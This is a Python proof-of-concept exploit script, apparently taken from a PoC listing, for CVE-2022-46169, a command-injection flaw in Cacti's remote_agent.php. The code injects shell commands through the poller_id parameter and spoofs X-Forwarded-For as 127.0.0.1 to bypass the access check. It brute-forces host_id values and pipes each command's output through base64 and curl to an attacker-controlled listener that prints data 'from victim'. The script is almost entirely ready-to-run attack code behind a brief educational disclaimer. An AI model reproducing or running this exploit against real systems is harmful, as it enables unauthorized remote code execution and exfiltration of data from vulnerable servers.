4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2022-46169_helper.py PY
# MIT License
# 
# Copyright (c) 2023 Anthony Hanel
# 
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# 
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# 
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# 
# This script is intended for educational purposes and lawful use only. 
# Always obtain proper authorization before performing any kind of penetration 
# testing or security assessment.

import os
import http.server
import socketserver
import argparse
import subprocess
from time import sleep
import urllib.request
import threading
import base64
import readline
import sys
import requests

# Assigned by start_server() once the listener object exists; the main block
# reads it to call shutdown() on the server from the main thread.
httpd_server = None   # global reference to the server
# -1 means no working host_id is known yet. execute_exploit() stores the first
# host_id for which send_exploit_request() reports success and reuses it after.
valid_host_id = -1    # reduce redundant traffic once a valid host_id has been found

class RequestHandler(http.server.BaseHTTPRequestHandler):
    """HTTP handler that prints base64-encoded request bodies to stdout.

    GET and POST requests are treated identically: the body is read according
    to the Content-Length header, base64-decoded and printed. Every request is
    answered with an empty ``200`` response so the sending client receives a
    well-formed HTTP reply instead of a dropped connection.
    """

    def do_GET(self):
        """Handle a GET request by printing its (possibly empty) body."""
        self.print_received_data()

    def do_POST(self):
        """Handle a POST request by printing its body."""
        self.print_received_data()

    def log_request(self, code='-', size='-'):
        """Suppress the per-request access-log line.

        ``send_response`` would otherwise write a log line to stderr for every
        request and interleave it with the interactive prompt.
        """

    def print_received_data(self):
        """Read, decode and print the request body, then acknowledge it.

        A malformed or negative Content-Length is treated as an empty body.
        Bodies that are not valid base64 are reported in raw form rather than
        raising inside the handler.
        """
        try:
            content_length = int(self.headers.get('Content-Length', 0))
        except (TypeError, ValueError):
            content_length = 0
        # read(-1) would block until the peer closes the socket, so never pass
        # a negative length through.
        incoming_data = self.rfile.read(content_length) if content_length > 0 else b""

        try:
            # binascii.Error (bad padding etc.) is a ValueError subclass.
            decoded_data = base64.b64decode(incoming_data).decode(errors="replace")
        except ValueError:
            print(f"\nReceived undecodable data from victim:\n{incoming_data!r}")
        else:
            print(f"\nReceived from victim:\n{decoded_data}")

        # Always complete the HTTP exchange.
        self.send_response(200)
        self.send_header('Content-Length', '0')
        self.end_headers()

def start_server(listening_port):
    """Run the HTTP listener on *listening_port* until it is shut down.

    The server object is published through the module-level ``httpd_server``
    so another thread can call ``shutdown()`` on it. This function blocks in
    ``serve_forever()`` and closes the listening socket when that returns.

    Args:
        listening_port: TCP port to bind on all interfaces.

    Raises:
        OSError: if the port cannot be bound; ``httpd_server`` is then left
            unchanged.
    """
    global httpd_server
    # Defer binding so address reuse can be enabled on this instance first;
    # otherwise a quick restart can fail with "Address already in use".
    server = socketserver.TCPServer(
        ("", listening_port), RequestHandler, bind_and_activate=False
    )
    server.allow_reuse_address = True
    # The context manager calls server_close() on exit, including when
    # binding fails, so the socket is never leaked.
    with server:
        server.server_bind()
        server.server_activate()
        httpd_server = server
        print("Server is now listening on port: ", listening_port, "\n")
        server.serve_forever()


def process_user_commands(target_url, server_ip, server_port, max_host_ids=100, max_local_data_ids=50):
    """Prompt for commands in a loop and pass each one to ``execute_exploit``.

    The loop ends when the user types ``exit`` (case-insensitive, surrounding
    whitespace ignored) or when stdin reaches end-of-file (e.g. Ctrl+D).
    Blank lines are ignored instead of being forwarded.

    Args:
        target_url: Base URL forwarded to ``execute_exploit``.
        server_ip: Listener IP forwarded to ``execute_exploit``.
        server_port: Listener port forwarded to ``execute_exploit``.
        max_host_ids: Upper bound forwarded to ``execute_exploit``.
        max_local_data_ids: Upper bound forwarded to ``execute_exploit``.
    """
    # Short pause before the first prompt; presumably lets the listener
    # thread print its startup banner first.
    sleep(0.25)
    while True:
        try:
            user_cmd = input("Enter a command to execute on the target: ")
        except EOFError:
            # Closed stdin means "quit"; returning lets the caller run its
            # normal shutdown path instead of dying with a traceback.
            print()
            break
        normalized = user_cmd.strip()
        if not normalized:
            continue
        if normalized.lower() == "exit":
            break
        execute_exploit(target_url, user_cmd, max_host_ids, max_local_data_ids, server_ip, server_port)

def send_exploit_request(target_url, user_cmd, host_id, max_local_data_ids, server_ip, server_port):
    """Send one GET request to ``<target_url>/remote_agent.php``.

    The ``poller_id`` query parameter carries a shell fragment that runs
    *user_cmd*, base64-encodes its output and posts it with curl to
    ``http://<server_ip>:<server_port>``.

    Args:
        target_url: Base URL of the target.
        user_cmd: Command string embedded in the payload.
        host_id: Value sent as the ``host_id`` parameter.
        max_local_data_ids: ``local_data_ids[]`` is sent as
            ``0 .. max_local_data_ids - 1``.
        server_ip: Address the payload posts its output to.
        server_port: Port the payload posts its output to.

    Returns:
        True if the response text contains ``'proc'``; False otherwise or
        when the request raises ``requests.RequestException``.
    """
    injected = f'; /bin/sh -c "{user_cmd}" | base64 | curl -XPOST -d @- http://{server_ip}:{server_port}'
    query = {
        'action': 'polldata',
        'host_id': host_id,
        'poller_id': injected,
        'local_data_ids[]': [*range(max_local_data_ids)],
    }
    spoofed_headers = {'X-Forwarded-For': '127.0.0.1'}
    endpoint = f'{target_url}/remote_agent.php'

    try:
        reply = requests.get(endpoint, params=query, headers=spoofed_headers)
        return 'proc' in reply.text
    except requests.RequestException as e:
        print(f"Error occurred while sending request: {e}")
        return False

def execute_exploit(target_url, user_cmd, max_host_ids, max_local_data_ids, server_ip, server_port):
    """Run *user_cmd* through ``send_exploit_request``, finding a host_id if needed.

    While the module-level ``valid_host_id`` is still ``-1``, host ids
    ``0 .. max_host_ids - 1`` are tried in order; the first one for which
    ``send_exploit_request`` reports success is stored in ``valid_host_id``.
    Once a valid id is stored, a single request is sent with it.
    """
    global valid_host_id

    if valid_host_id == -1:
        # No known-good id yet: probe candidates and stop at the first hit.
        for candidate in range(max_host_ids):
            print(f"[*] Trying host_id: {candidate}")
            if send_exploit_request(target_url, user_cmd, candidate, max_local_data_ids, server_ip, server_port):
                valid_host_id = candidate
                print(f"[+] Successful exploitation with host_id = {valid_host_id}")
                break
        return

    # A working id was found earlier; reuse it directly.
    send_exploit_request(target_url, user_cmd, valid_host_id, max_local_data_ids, server_ip, server_port)

if __name__ == "__main__":
    # Script entry point: parse arguments, start the listener in a background
    # thread, run the interactive prompt, then shut the listener down.
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', required=True, help='Target URL (e.g., http://10.10.11.211)')
    parser.add_argument('--server', required=True, help='IP address for the listening server (e.g., 10.10.14.86)')
    parser.add_argument('--port', default=5000, type=int, help='Port number for the listening server (e.g., 5000)')

    # With no arguments at all, show the full help text rather than only
    # argparse's terse "required arguments" error.
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    args = parser.parse_args()

    print("\nCurrent configuration:")
    print(f"  Target: {args.target}")
    print(f"  Listening Server IP: {args.server}")
    print(f"  Listening Server Port: {args.port}\n")

    server_thread = threading.Thread(target=start_server, args=(args.port,))
    server_thread.start()

    interrupted = False
    try:
        # Blocks until the user ends the interactive session.
        process_user_commands(args.target, args.server, args.port)
        print("\nTerminating server...")
    except KeyboardInterrupt:
        interrupted = True
        print("\nCtrl+C received. Shutting down.")
    finally:
        # Runs for every exit path so the non-daemon server thread can never
        # keep the process alive. httpd_server stays None when the listener
        # failed to start (e.g. the port was already in use).
        if httpd_server is not None:
            httpd_server.shutdown()  # tell the server to stop
        server_thread.join()  # wait for the server thread to finish

    if not interrupted:
        print("Server terminated :)")
    # Both a normal "exit" and Ctrl+C are clean terminations.
    sys.exit(0)